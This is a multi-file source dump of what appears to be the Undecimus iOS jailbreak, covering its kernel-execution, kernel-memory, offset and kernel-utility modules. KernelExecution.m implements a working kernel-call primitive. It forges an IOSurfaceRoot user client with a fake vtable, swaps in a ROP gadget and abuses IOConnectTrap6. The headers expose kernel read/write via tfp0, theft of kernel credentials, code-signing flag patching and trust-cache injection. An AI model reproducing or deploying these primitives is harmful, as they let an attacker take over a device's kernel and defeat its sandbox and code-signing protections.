// Construction: convenience constructors and the matching initialisers.
+(ArchiveFile*)archiveWithFile:(NSString*)filename;
+(ArchiveFile*)archiveWithFd:(int)fd;
-(ArchiveFile*)initWithFile:(NSString*)filename;
-(ArchiveFile*)initWithFd:(int)fd;

// Inspection.
-(BOOL)contains:(NSString*)file;
-(NSDictionary *)files;

// Extraction. Every variant returns a BOOL; presumably YES on success, to be
// confirmed against the implementation.
-(BOOL)extract;
-(BOOL)extractFileNum:(int)fileNum toFd:(int)fd;
-(BOOL)extract:(NSString*)file toPath:(NSString*)path;
-(BOOL)extractWithFlags:(int)flags;
-(BOOL)extractToPath:(NSString*)path;
-(BOOL)extractToPath:(NSString*)path withOwner:(id_t)owner andGroup:(id_t)group;
-(BOOL)extractToPath:(NSString*)path overWriteDirectories:(BOOL)overwrite_dirs;
-(BOOL)extractToPath:(NSString*)path withFlags:(int)flags;
-(BOOL)extractToPath:(NSString*)path withFlags:(int)flags overWriteDirectories:(BOOL)overwrite_dirs;
-(BOOL)extractToPath:(NSString*)path withFlags:(int)flags overWriteDirectories:(BOOL)overwrite_dirs owner:(id_t)owner andGroup:(id_t)group;
@end
33 |
34 | #endif /* _ARCHIVE_FILE_H */
35 |
--------------------------------------------------------------------------------
/Undecimus/source/CreditsTableViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // CreditsTableViewController.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 9/14/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface CreditsTableViewController : UITableViewController
12 | @property (strong, nonatomic) IBOutlet UITableView *SpecialThanksTableView;
13 |
14 | @property (weak, nonatomic) IBOutlet UIButton *pwn20wndButton;
15 | @property (weak, nonatomic) IBOutlet UIView *pwn20wndContentView;
16 | @property (weak, nonatomic) IBOutlet UIButton *sbingnerButton;
17 | @property (weak, nonatomic) IBOutlet UIView *sbingerContentView;
18 | @property (weak, nonatomic) IBOutlet UIButton *i41nbeerButton;
19 | @property (weak, nonatomic) IBOutlet UIView *i41nbeerContentView;
20 | @property (weak, nonatomic) IBOutlet UIButton *_bazadButton;
21 | @property (weak, nonatomic) IBOutlet UIView *_bazadContentView;
22 | @property (weak, nonatomic) IBOutlet UIButton *MorpheusButton;
23 | @property (weak, nonatomic) IBOutlet UIView *MorpheusContentView;
24 | @property (weak, nonatomic) IBOutlet UIButton *xerubButton;
25 | @property (weak, nonatomic) IBOutlet UIView *xerubContentView;
26 | @property (weak, nonatomic) IBOutlet UIButton *ibsparkesButton;
27 | @property (weak, nonatomic) IBOutlet UIView *ibsparkesContentView;
28 | @property (weak, nonatomic) IBOutlet UIButton *stek29Button;
29 | @property (weak, nonatomic) IBOutlet UIView *stek29ContentView;
30 | @property (weak, nonatomic) IBOutlet UIButton *theninjaprawnButton;
31 | @property (weak, nonatomic) IBOutlet UIView *theninjaprawnContentView;
32 | @property (weak, nonatomic) IBOutlet UIButton *jonathansealsButton;
33 | @property (weak, nonatomic) IBOutlet UIView *JonathansealsContentView;
34 | @property (weak, nonatomic) IBOutlet UIButton *saurikButton;
35 | @property (weak, nonatomic) IBOutlet UIView *saurikContentView;
36 | @property (weak, nonatomic) IBOutlet UIButton *fce365Button;
37 | @property (weak, nonatomic) IBOutlet UIView *fce365ContentView;
38 | @property (weak, nonatomic) IBOutlet UIButton *tihmstarButton;
39 | @property (weak, nonatomic) IBOutlet UIView *tihmstarContentView;
40 | @property (weak, nonatomic) IBOutlet UIButton *s1guzaButton;
41 | @property (weak, nonatomic) IBOutlet UIView *s1guzaContentView;
42 | @property (weak, nonatomic) IBOutlet UIButton *S0rryMyBadButton;
43 | @property (weak, nonatomic) IBOutlet UIView *s0rrymybadContentView;
44 | @property (weak, nonatomic) IBOutlet UIButton *externalistButton;
45 | @property (weak, nonatomic) IBOutlet UIView *externatlistContentView;
46 | @property (weak, nonatomic) IBOutlet UIButton *realbrighiupButton;
47 | @property (weak, nonatomic) IBOutlet UIView *realbrighiuoContentView;
48 | @property (weak, nonatomic) IBOutlet UIButton *nitotvButton;
49 | @property (weak, nonatomic) IBOutlet UIView *nitotvContentView;
50 | @property (weak, nonatomic) IBOutlet UIButton *_matchsticButton;
51 | @property (weak, nonatomic) IBOutlet UIView *matchsticContentView;
52 | @property (weak, nonatomic) IBOutlet UIButton *umanghereButton;
53 | @property (weak, nonatomic) IBOutlet UIView *umanghereContentView;
54 | @property (weak, nonatomic) IBOutlet UIButton *miscmistyButton;
55 | @property (weak, nonatomic) IBOutlet UIView *miscmistyContentView;
56 | @property (weak, nonatomic) IBOutlet UIButton *pimskeksButton;
57 | @property (weak, nonatomic) IBOutlet UIView *pimmskeksContentView;
58 | @property (weak, nonatomic) IBOutlet UIButton *coolstarorgButton;
59 | @property (weak, nonatomic) IBOutlet UIView *coolstarorgContentView;
60 | @property (weak, nonatomic) IBOutlet UIButton *diatrusButton;
61 | @property (weak, nonatomic) IBOutlet UIView *diatrusContentView;
62 | @property (weak, nonatomic) IBOutlet UIButton *HydriButton;
63 | @property (weak, nonatomic) IBOutlet UIView *HydriContentView;
64 | @property (weak, nonatomic) IBOutlet UIButton *c9shadyButton;
65 | @property (weak, nonatomic) IBOutlet UIView *c9shadyContentView;
66 | @property (weak, nonatomic) IBOutlet UIButton *pixelomerButton;
67 | @property (weak, nonatomic) IBOutlet UIView *pixelomerContentView;
68 | @property (weak, nonatomic) IBOutlet UIButton *AaronButton;
69 | @property (weak, nonatomic) IBOutlet UIView *AaronContentView;
70 | @property (weak, nonatomic) IBOutlet UIButton *CarsukiButton;
71 | @property (weak, nonatomic) IBOutlet UIView *CarsukiContentView;
72 | @property (weak, nonatomic) IBOutlet UIButton *libimobiledeviceButton;
73 | @property (weak, nonatomic) IBOutlet UIView *libimobiledeviceContentView;
74 | @property (weak, nonatomic) IBOutlet UIButton *undecimusresourcesButton;
75 | @property (weak, nonatomic) IBOutlet UIView *undecimusresourcesContentView;
76 | @property (weak, nonatomic) IBOutlet UIButton *jakeashacksButton;
77 | @property (weak, nonatomic) IBOutlet UIView *jakeashacksContentView;
78 | @property (weak, nonatomic) IBOutlet UIButton *notcomButton;
79 | @property (weak, nonatomic) IBOutlet UIView *notcomContentView;
80 | @property (weak, nonatomic) IBOutlet UIButton *cryptiiicButton;
81 | @property (weak, nonatomic) IBOutlet UIView *cryptiiicContentView;
82 | @property (weak, nonatomic) IBOutlet UIButton *xerusdesignButton;
83 | @property (weak, nonatomic) IBOutlet UIView *xerusdesignContentView;
84 | @property (weak, nonatomic) IBOutlet UIButton *appledry05Button;
85 | @property (weak, nonatomic) IBOutlet UIView *appledry05ContentView;
86 | @property (weak, nonatomic) IBOutlet UIButton *ayyitzrobButton;
87 | @property (weak, nonatomic) IBOutlet UIView *ayyitzrobContentView;
88 | @property (weak, nonatomic) IBOutlet UIButton *midnightchipButton;
89 | @property (weak, nonatomic) IBOutlet UIView *midnightchipContentView;
90 | @property (weak, nonatomic) IBOutlet UIButton *swag_iosButton;
91 | @property (weak, nonatomic) IBOutlet UIView *swag_iosContentView;
92 | @property (weak, nonatomic) IBOutlet UIButton *jailbreakbusterButton;
93 | @property (weak, nonatomic) IBOutlet UIView
94 | *jailbreakbusterContentView;
95 | @property (weak, nonatomic) IBOutlet UIButton *PatrickButton;
96 | @property (weak, nonatomic) IBOutlet UIView *PatrickContentView;
97 | @property (weak, nonatomic) IBOutlet UIView *SamgContentView;
98 | @property (weak, nonatomic) IBOutlet UIButton *SamgButton;
99 | @property (weak, nonatomic) IBOutlet UIButton *DennisButton;
100 | @property (weak, nonatomic) IBOutlet UIView *DennisContentView;
101 | @property (weak, nonatomic) IBOutlet UIButton *iOSAppDevButton;
102 | @property (weak, nonatomic) IBOutlet UIView *iOSAppDevContentView;
103 | @property (weak, nonatomic) IBOutlet UIButton *UbikButton;
104 | @property (weak, nonatomic) IBOutlet UIView *UbikContentView;
105 | @property (weak, nonatomic) IBOutlet UIButton *benjweaverdevButton;
106 | @property (weak, nonatomic) IBOutlet UIView *benjweaverdevContentView;
107 |
108 | + (NSURL *)getURLForUserName:(NSString *)userName;
109 |
110 | @end
111 |
--------------------------------------------------------------------------------
/Undecimus/source/FakeApt.h:
--------------------------------------------------------------------------------
1 | //
2 | // FakeApt.h
3 | // This is far from a complete implementation
4 | //
5 | // Created by Sam Bingner on 1/24/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef FakeApt_h
10 | #define FakeApt_h
11 |
12 | int versioncomp(NSString *v1, NSString *v2);
13 | NSDictionary *parseDependsOrProvides(NSString *string);
14 | BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
15 | NSString *versionOfPkg(NSString *pkg);
16 | NSArray *resolveDepsForPkg(NSString * _Nonnull pkg, BOOL noPreDeps);
17 | BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject);
18 | NSDictionary *getPkgs(void);
19 | NSString *debForPkg(NSString *pkg);
20 | NSArray *debsForPkgs(NSArray *pkgs);
21 |
22 | #endif /* FakeApt_h */
23 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelExecution.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | bool init_kexec(void);
5 | void term_kexec(void);
6 | kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6);
7 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelExecution.m:
--------------------------------------------------------------------------------
1 | #include "KernelExecution.h"
2 | #include "KernelMemory.h"
3 | #include "KernelOffsets.h"
4 | #include "KernelUtilities.h"
5 | #include "find_port.h"
6 | #include "kernel_call.h"
7 | #include
8 | #include
9 | #include
10 | #import
11 | #include "parameters.h"
12 | #include "kc_parameters.h"
13 | #include "kernel_memory.h"
14 |
15 | #if !__arm64e__
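/*
 * Looks up the "IOSurfaceRoot" IOKit service and opens a user client
 * connection to it for the current task.
 *
 * Returns the connection port on success. Both failure paths log and
 * terminate the process with exit(EXIT_FAILURE), so the
 * MACH_PORT_VALID() check the caller performs on the result is never
 * reached with an invalid port.
 */
static mach_port_t prepare_user_client()
{
    kern_return_t err;
    mach_port_t user_client = MACH_PORT_NULL;
    // The matching dictionary is consumed by IOServiceGetMatchingService.
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));

    if (service == IO_OBJECT_NULL) {
        LOG("unable to find service");
        exit(EXIT_FAILURE);
    }

    err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
    // The service object belongs to the caller and is no longer needed once
    // the connection attempt has been made; the original never released it.
    IOObjectRelease(service);
    if (err != KERN_SUCCESS) {
        LOG("unable to get user client connection");
        exit(EXIT_FAILURE);
    }

    return user_client;
}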
35 |
36 | static mach_port_t user_client;
37 | static kptr_t IOSurfaceRootUserClient_port;
38 | static kptr_t IOSurfaceRootUserClient_addr;
39 | static kptr_t fake_vtable;
40 | static kptr_t fake_client;
41 | static const int fake_kalloc_size = 0x1000;
42 | #endif
43 | static pthread_mutex_t kexec_lock;
44 |
// Prepare the kernel-call primitive used by kexec().
//
// arm64e builds: validate the tfp0-derived task state and delegate to kernel_call_init().
// Other builds: open an IOSurfaceRoot user client, copy the client object and its
// vtable into two kernel allocations, redirect the port's kobject field to the copy,
// and replace one vtable slot in the copy with a gadget address.
//
// Returns true on success and false as soon as one of the validity checks fails.
//
// NOTE(review): on the non-arm64e side the early `return false` paths do not undo
// earlier steps (the open user client, the fake_vtable allocation), and the bool
// results of WriteKernel64() and the result of pthread_mutex_init() are not checked.
// NOTE(review): the separate arm64e path is presumably needed because vtable
// pointers are PAC-signed there (see kc_parameters.h) — confirm.
bool init_kexec()
{
#if __arm64e__
    if (!parameters_init()) return false;
    kernel_task_port = tfp0;
    if (!MACH_PORT_VALID(kernel_task_port)) return false;
    current_task = ReadKernel64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    if (!KERN_POINTER_VALID(current_task)) return false;
    kernel_task = ReadKernel64(getoffset(kernel_task));
    if (!KERN_POINTER_VALID(kernel_task)) return false;
    if (!kernel_call_init()) return false;
#else
    // prepare_user_client() exits the process on failure, so this check is a second line of defence
    user_client = prepare_user_client();
    if (!MACH_PORT_VALID(user_client)) return false;

    // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
    IOSurfaceRootUserClient_port = get_address_of_port(proc_struct_addr(), user_client); // UserClients are just mach_ports, so we find its address
    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) return false;

    IOSurfaceRootUserClient_addr = ReadKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // The UserClient itself (the C++ object) is at the kobject field
    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_addr)) return false;

    kptr_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_vtab)) return false;

    // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
    // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel

    // Create the vtable in the kernel memory, then copy the existing vtable into there
    fake_vtable = kmem_alloc(fake_kalloc_size);
    if (!KERN_POINTER_VALID(fake_vtable)) return false;

    // 0x200 entries of 8 bytes fill the whole fake_kalloc_size (0x1000) allocation;
    // the two constants are not derived from each other and must be kept in step
    for (int i = 0; i < 0x200; i++) {
        WriteKernel64(fake_vtable + i * 8, ReadKernel64(IOSurfaceRootUserClient_vtab + i * 8));
    }

    // Create the fake user client
    fake_client = kmem_alloc(fake_kalloc_size);
    if (!KERN_POINTER_VALID(fake_client)) return false;

    // Same fixed-size copy as above, this time of the client object itself
    for (int i = 0; i < 0x200; i++) {
        WriteKernel64(fake_client + i * 8, ReadKernel64(IOSurfaceRootUserClient_addr + i * 8));
    }

    // Write our fake vtable into the fake user client
    WriteKernel64(fake_client, fake_vtable);

    // Replace the user client with ours
    WriteKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), fake_client);

    // Now the userclient port we have will look into our fake user client rather than the old one

    // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
    // The slot index 0xB7 is hard-coded here rather than looked up
    WriteKernel64(fake_vtable + 8 * 0xB7, getoffset(add_x0_x0_0x40_ret));

#endif
    // Reached on both build variants once setup has succeeded
    pthread_mutex_init(&kexec_lock, NULL);
    return true;
}
104 |
// Tear down what init_kexec() set up, then destroy the lock that guards kexec().
void term_kexec()
{
#if __arm64e__
    kernel_call_deinit();
#else
    // Point the port's kobject field back at the original client object first,
    // so nothing refers to the copies when they are released below.
    const kptr_t kobject_slot = IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT);
    WriteKernel64(kobject_slot, IOSurfaceRootUserClient_addr);

    // Release both kernel allocations and close the connection
    kmem_free(fake_vtable, fake_kalloc_size);
    kmem_free(fake_client, fake_kalloc_size);
    IOServiceClose(user_client);
#endif
    pthread_mutex_destroy(&kexec_lock);
}
117 |
// Call the kernel function at `ptr` with arguments x0..x6 while holding kexec_lock.
//
// Both back ends hand back a 32-bit value (kernel_call_7 returns uint32_t,
// IOConnectTrap6 returns kern_return_t), so the upper half of the kptr_t result
// does not come from the called function.
kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6)
{
    kptr_t result = 0;
    pthread_mutex_lock(&kexec_lock);
#if __arm64e__
    result = kernel_call_7(ptr, 7, x0, x1, x2, x3, x4, x5, x6);
#else
    // IOConnectTrapX enters the kernel through iokit_user_client_trap (MIG), which asks
    // IOUserClient::getTargetAndTrapForIndex for a trap struct holding an object and a
    // function pointer. That in turn calls IOUserClient::getExternalTrapForIndex, whose
    // vtable slot init_kexec() replaced with a gadget returning (client + 0x40). The
    // "trap" is therefore read from inside our copy of the client, which we control.
    // The function is invoked on the object, and in C++ the object is passed as the
    // first argument (`this`), so x0 travels in the object field and the remaining
    // arguments are passed through as usual.

    // The two fields at +0x40 and +0x48 are borrowed for the duration of the call:
    // save them, install object and function, trap, then put the old contents back.
    // (The original author was unsure whether restoring them is required.)
    const kptr_t object_slot = fake_client + 0x40;
    const kptr_t function_slot = fake_client + 0x48;

    const kptr_t saved_object = ReadKernel64(object_slot);
    const kptr_t saved_function = ReadKernel64(function_slot);

    WriteKernel64(object_slot, x0);
    WriteKernel64(function_slot, ptr);
    result = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);

    WriteKernel64(object_slot, saved_object);
    WriteKernel64(function_slot, saved_function);
#endif
    pthread_mutex_unlock(&kexec_lock);
    return result;
}
146 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelMemory.h:
--------------------------------------------------------------------------------
1 | #ifndef KernelMemory_h
2 | #define KernelMemory_h
3 |
4 | #include
5 | #include
6 | #include
7 |
/***** mach_vm.h *****/
// Prototypes for the mach_vm_* calls are repeated here, under the name of the
// header they mirror, so that files including KernelMemory.h can call them.
kern_return_t mach_vm_read(
    vm_map_t target_task,
    mach_vm_address_t address,
    mach_vm_size_t size,
    vm_offset_t* data,
    mach_msg_type_number_t* dataCnt);

kern_return_t mach_vm_write(
    vm_map_t target_task,
    mach_vm_address_t address,
    vm_offset_t data,
    mach_msg_type_number_t dataCnt);

kern_return_t mach_vm_read_overwrite(
    vm_map_t target_task,
    mach_vm_address_t address,
    mach_vm_size_t size,
    mach_vm_address_t data,
    mach_vm_size_t* outsize);

kern_return_t mach_vm_allocate(
    vm_map_t target,
    mach_vm_address_t* address,
    mach_vm_size_t size,
    int flags);

kern_return_t mach_vm_deallocate(
    vm_map_t target,
    mach_vm_address_t address,
    mach_vm_size_t size);

kern_return_t mach_vm_protect(
    vm_map_t target_task,
    mach_vm_address_t address,
    mach_vm_size_t size,
    boolean_t set_maximum,
    vm_prot_t new_protection);

kern_return_t mach_vm_remap(
    mach_port_name_t target,
    mach_vm_address_t *address,
    mach_vm_size_t size,
    mach_vm_offset_t mask,
    int flags,
    mach_port_name_t src_task,
    mach_vm_address_t src_address,
    boolean_t copy,
    vm_prot_t *cur_protection,
    vm_prot_t *max_protection,
    vm_inherit_t inheritance);

// Globals defined elsewhere.
// NOTE(review): kreads/kwrites look like running counts of kernel reads and writes — confirm against the definitions.
extern size_t kreads;
extern size_t kwrites;
// Task port used for kernel memory access; init_kexec() copies it into kernel_task_port on arm64e.
extern mach_port_t tfp0;

// Buffer-sized kernel read/write. NOTE(review): the size_t result is presumably the number of bytes transferred — confirm.
size_t kread(kptr_t where, void* p, size_t size);
size_t kwrite(kptr_t where, const void* p, size_t size);

// rk32/rk64 are short aliases for the fixed-width readers below.
// The readers return the value directly, so a failed read cannot be told apart from data through this interface.
#define rk32(kaddr) ReadKernel32(kaddr)
#define rk64(kaddr) ReadKernel64(kaddr)
uint32_t ReadKernel32(kptr_t kaddr);
uint64_t ReadKernel64(kptr_t kaddr);

// wk32/wk64 are short aliases for the fixed-width writers below.
// The writers return bool; callers in KernelExecution.m ignore that result.
#define wk32(kaddr, val) WriteKernel32(kaddr, val)
#define wk64(kaddr, val) WriteKernel64(kaddr, val)
bool WriteKernel32(kptr_t kaddr, uint32_t val);
bool WriteKernel64(kptr_t kaddr, uint64_t val);

// Buffer variants with a bool status instead of a byte count
bool wkbuffer(kptr_t kaddr, void* buffer, size_t length);
bool rkbuffer(kptr_t kaddr, void* buffer, size_t length);

// Takes raw uint64_t addresses rather than kptr_t, a 32-bit length, and reports no status
void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);

bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot);

// Kernel allocation helpers; callers validate the returned address with KERN_POINTER_VALID()
// and pass the same size back to kmem_free().
kptr_t kmem_alloc(uint64_t size);
kptr_t kmem_alloc_wired(uint64_t size);
bool kmem_free(kptr_t kaddr, uint64_t size);

// Select which port backs the read/write helpers above.
// NOTE(review): the exact effect of each variant is defined outside this header.
void prepare_rk_via_kmem_read_port(mach_port_t port);
void prepare_rwk_via_tfp0(mach_port_t port);
void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0);

// query whether kmem read or write is present
bool have_kmem_read(void);
bool have_kmem_write(void);
95 |
96 | #endif
97 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelOffsets.h:
--------------------------------------------------------------------------------
1 | #ifndef KernelOffsets_h
2 | #define KernelOffsets_h
3 |
// Table of per-build offset values, defined elsewhere.
// NOTE(review): presumably indexed by enum kernel_offset through koffset() — confirm in the implementation.
extern uint32_t* offsets;

// Symbolic names for the kernel structure fields, vtable slots and sizes this
// project reads or writes. The enumerators carry no explicit values, so their
// numeric value is their position in this list: inserting or reordering entries
// changes every later value.
enum kernel_offset {
    /* struct task */
    KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    KSTRUCT_OFFSET_TASK_REF_COUNT,
    KSTRUCT_OFFSET_TASK_ACTIVE,
    KSTRUCT_OFFSET_TASK_VM_MAP,
    KSTRUCT_OFFSET_TASK_NEXT,
    KSTRUCT_OFFSET_TASK_PREV,
    KSTRUCT_OFFSET_TASK_ITK_SPACE,
    KSTRUCT_OFFSET_TASK_BSD_INFO,
    KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR,
    KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE,
    KSTRUCT_OFFSET_TASK_TFLAGS,
    KSTRUCT_OFFSET_TASK_LOCK,

    /* struct ipc_port */
    KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    /* struct proc */
    KSTRUCT_OFFSET_PROC_PID,
    KSTRUCT_OFFSET_PROC_P_FD,
    KSTRUCT_OFFSET_PROC_TASK,
    KSTRUCT_OFFSET_PROC_UCRED,
    KSTRUCT_OFFSET_PROC_P_LIST,
    KSTRUCT_OFFSET_PROC_P_CSFLAGS,
    KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE,
    KSTRUCT_OFFSET_PROC_MLOCK,
    KSTRUCT_OFFSET_PROC_UCRED_MLOCK,
    KSTRUCT_OFFSET_PROC_SVUID,
    KSTRUCT_OFFSET_PROC_SVGID,

    /* struct filedesc */
    KSTRUCT_OFFSET_FILEDESC_FD_OFILES,

    /* struct fileproc */
    KSTRUCT_OFFSET_FILEPROC_F_FGLOB,

    /* struct fileglob */
    KSTRUCT_OFFSET_FILEGLOB_FG_DATA,

    /* struct socket */
    KSTRUCT_OFFSET_SOCKET_SO_PCB,

    /* struct pipe */
    KSTRUCT_OFFSET_PIPE_BUFFER,

    /* struct ipc_space */
    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,

    /* struct vnode */
    KSTRUCT_OFFSET_VNODE_V_MOUNT,
    KSTRUCT_OFFSET_VNODE_VU_SPECINFO,
    KSTRUCT_OFFSET_VNODE_V_LOCK,
    KSTRUCT_OFFSET_VNODE_V_DATA,

    /* struct specinfo */
    KSTRUCT_OFFSET_SPECINFO_SI_FLAGS,

    /* struct mount */
    KSTRUCT_OFFSET_MOUNT_MNT_FLAG,
    KSTRUCT_OFFSET_MOUNT_MNT_DATA,
    KSTRUCT_OFFSET_MOUNT_MNT_MLOCK,

    /* struct host */
    KSTRUCT_OFFSET_HOST_SPECIAL,

    /* struct ucred */
    KSTRUCT_OFFSET_UCRED_CR_REF,
    KSTRUCT_OFFSET_UCRED_CR_UID,
    KSTRUCT_OFFSET_UCRED_CR_RUID,
    KSTRUCT_OFFSET_UCRED_CR_SVUID,
    KSTRUCT_OFFSET_UCRED_CR_NGROUPS,
    KSTRUCT_OFFSET_UCRED_CR_GROUPS,
    KSTRUCT_OFFSET_UCRED_CR_RGID,
    KSTRUCT_OFFSET_UCRED_CR_SVGID,
    KSTRUCT_OFFSET_UCRED_CR_GMUID,
    KSTRUCT_OFFSET_UCRED_CR_FLAGS,
    KSTRUCT_OFFSET_UCRED_CR_LABEL,

    /* struct label */
    KSTRUCT_OFFSET_LABEL_L_FLAGS,
    KSTRUCT_OFFSET_LABEL_L_PERPOLICY,

    /* struct ipc_entry */
    KSTRUCT_SIZE_IPC_ENTRY, // a structure size, unlike the field offsets around it
    KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS,

    /* struct vnode (second group, separate from the vnode entries above) */
    KSTRUCT_OFFSET_VNODE_V_FLAG,

    /* vtable OSDictionary */
    KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP,
    KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP,
    KVTABLE_OFFSET_OSDICTIONARY_MERGE,

    /* vtable OSArray */
    KVTABLE_OFFSET_OSARRAY_MERGE,
    KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT,
    KVTABLE_OFFSET_OSARRAY_GETOBJECT,

    /* vtable OSObject */
    KVTABLE_OFFSET_OSOBJECT_RELEASE,
    KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT,
    KVTABLE_OFFSET_OSOBJECT_RETAIN,

    /* vtable OSString */
    KVTABLE_OFFSET_OSSTRING_GETLENGTH,

    KFREE_ADDR_OFFSET,
};

// Return the 32-bit value associated with `offset`; callers add it to a kernel object address.
uint32_t koffset(enum kernel_offset offset);
127 |
128 | #endif
129 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelUtilities.h:
--------------------------------------------------------------------------------
1 | #ifndef kutils_h
2 | #define kutils_h
3 |
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #if 0
10 | Credits:
11 | - https://stek29.rocks/2018/01/26/sandbox.html
12 | - https://stek29.rocks/2018/12/11/shenanigans.html
13 | - http://newosxbook.com/QiLin/qilin.pdf
14 | - https://github.com/Siguza/v0rtex/blob/e6d54c97715d6dbcdda8b9a8090484a7a47019d0/src/v0rtex.m#L1623
15 | #endif
16 |
17 | #if 0
18 | TODO:
19 | - Patchfind proc_lock (High priority)
20 | - Patchfind proc_unlock (High priority)
21 | - Patchfind proc_ucred_lock (High priority)
22 | - Patchfind proc_ucred_unlock (High priority)
23 | - Patchfind vnode_lock (Low priority)
24 | - Patchfind vnode_unlock (Low priority)
25 | - Patchfind mount_lock (Low priority)
26 | - Patchfind mount_unlock (Low priority)
27 | - Patchfind task_set_platform_binary (High priority)
28 | - Patchfind kauth_cred_ref (Low priority)
29 | - Patchfind kauth_cred_unref (Low priority)
30 | - Patchfind chgproccnt (Low priority)
31 | - Patchfind kauth_cred_ref (Low priority)
32 | - Patchfind kauth_cred_unref (Low priority)
33 | - Patchfind extension_destroy (Low priority)
34 | - Patchfind extension_create_mach (Middle priority)
35 | - Use offsetof with XNU headers to find structure offsets (Low priority)
36 | - Update Unrestrict to implement the kernel calls
37 | #endif
38 |
// setoffset(foo, v) and getoffset(foo) stringize the bare identifier (`#offset`)
// and pass that string to set_offset()/get_offset(). Because the key is a string
// built at preprocessing time, a misspelled name still compiles.
// NOTE(review): how get_offset() reports an unknown key is not visible from this header.
#define setoffset(offset, val) set_offset(#offset, val)
#define getoffset(offset) get_offset(#offset)

// Shorthands that expand to a getOSBool() call at every use
#define OSBoolTrue getOSBool(true)
#define OSBoolFalse getOSBool(false)
44 |
45 | extern kptr_t kernel_base;
46 | extern uint64_t kernel_slide;
47 |
48 | extern kptr_t cached_proc_struct_addr;
49 | extern kptr_t cached_task_self_addr;
50 | extern bool found_offsets;
51 |
52 | kptr_t task_self_addr(void);
53 | kptr_t ipc_space_kernel(void);
54 | kptr_t find_kernel_base(void);
55 |
56 | kptr_t current_thread(void);
57 |
58 | mach_port_t fake_host_priv(void);
59 |
60 | int message_size_for_kalloc_size(int kalloc_size);
61 |
62 | kptr_t get_kernel_proc_struct_addr(void);
63 | bool iterate_proc_list(void (^handler)(kptr_t, pid_t, bool *));
64 | kptr_t get_proc_struct_for_pid(pid_t pid);
65 | kptr_t proc_struct_addr(void);
66 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port);
67 | kptr_t get_kernel_cred_addr(void);
68 | kptr_t give_creds_to_process_at_addr(kptr_t proc, kptr_t cred_addr);
69 | bool set_platform_binary(kptr_t proc, bool set);
70 |
71 | kptr_t zm_fix_addr(kptr_t addr);
72 |
73 | bool verify_tfp0(void);
74 |
75 | extern int (*pmap_load_trust_cache)(kptr_t kernel_trust, size_t length);
76 | int _pmap_load_trust_cache(kptr_t kernel_trust, size_t length);
77 |
78 | bool set_host_type(host_t host, uint32_t type);
79 | bool export_tfp0(host_t host);
80 | bool unexport_tfp0(host_t host);
81 |
82 | bool set_csflags(kptr_t proc, uint32_t flags, bool value);
83 | bool set_cs_platform_binary(kptr_t proc, bool value);
84 |
85 | bool execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));
86 |
87 | uint32_t get_proc_memstat_state(kptr_t proc);
88 | bool set_proc_memstat_state(kptr_t proc, uint32_t memstat_state);
